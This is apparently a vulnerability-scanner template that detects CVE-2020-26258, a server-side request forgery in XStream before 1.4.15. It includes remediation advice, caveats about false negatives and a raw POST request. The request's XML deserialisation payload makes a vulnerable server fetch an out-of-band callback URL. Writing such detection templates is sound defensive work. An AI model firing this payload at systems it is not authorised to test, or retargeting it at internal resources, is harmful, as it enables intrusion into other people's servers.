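# Detection template for CVE-2020-26258: server-side request forgery triggered
# while XStream unmarshals an XML request body.
#
# Reading the result:
#   * A match means the target issued an outbound HTTP request to the
#     out-of-band host while processing the body below.
#   * No match is not proof of a patched library. Only "/" is probed, so an
#     application that unmarshals XML on another path is not exercised, and
#     egress filtering can suppress the callback. The payload also relies on
#     JDK-internal classes (jdk.nashorn.*, com.sun.xml.internal.bind.*) that
#     are absent from newer JDKs, so it may fail to deserialise there.
#   * Confirm findings against the deployed XStream version (fixed in 1.4.15).
id: CVE-2020-26258

info:
  name: Xstream < 1.4.15 - Server Side Request Forgery
  author: pwnhxl
  severity: high
  description: |
    In XStream before version 1.4.15, a Server-Side Request Forgery vulnerability can be activated when unmarshalling. The vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream.
  remediation: |
    Upgrade XStream to 1.4.15 or later. Where an upgrade is not immediately possible, configure XStream's security framework with an allowlist restricted to the types the application actually needs, as described in the vendor advisory.
  reference:
    - https://x-stream.github.io/CVE-2020-26258.html
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26258
    - https://github.com/x-stream/xstream/security/advisories/GHSA-4cch-wxpw-8p28
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 7.7
    cve-id: CVE-2020-26258
    cwe-id: CWE-918
  tags: cve,cve2020,xstream,ssrf,oast

requests:
  # Single POST whose XML body is handed to XStream by the target. The <url>
  # element points at the scanner's out-of-band host, so a fetch by the server
  # is observable without reading any response content.
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <map>
          <entry>
            <jdk.nashorn.internal.objects.NativeString>
              <flags>0</flags>
              <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
                <dataHandler>
                  <dataSource class='javax.activation.URLDataSource'>
                    <url>http://{{interactsh-url}}/internal/:</url>
                  </dataSource>
                  <transferFlavors/>
                </dataHandler>
                <dataLen>0</dataLen>
              </value>
            </jdk.nashorn.internal.objects.NativeString>
            <string>test</string>
          </entry>
        </map>

    # Both matchers must hold: the interaction has to be HTTP (not just a DNS
    # lookup) and has to carry a Java User-Agent header.
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      # Ties the callback to a Java HTTP client rather than to an unrelated
      # fetcher that happened to resolve the out-of-band host.
      - type: word
        part: interactsh_request
        words:
          - "User-Agent: Java"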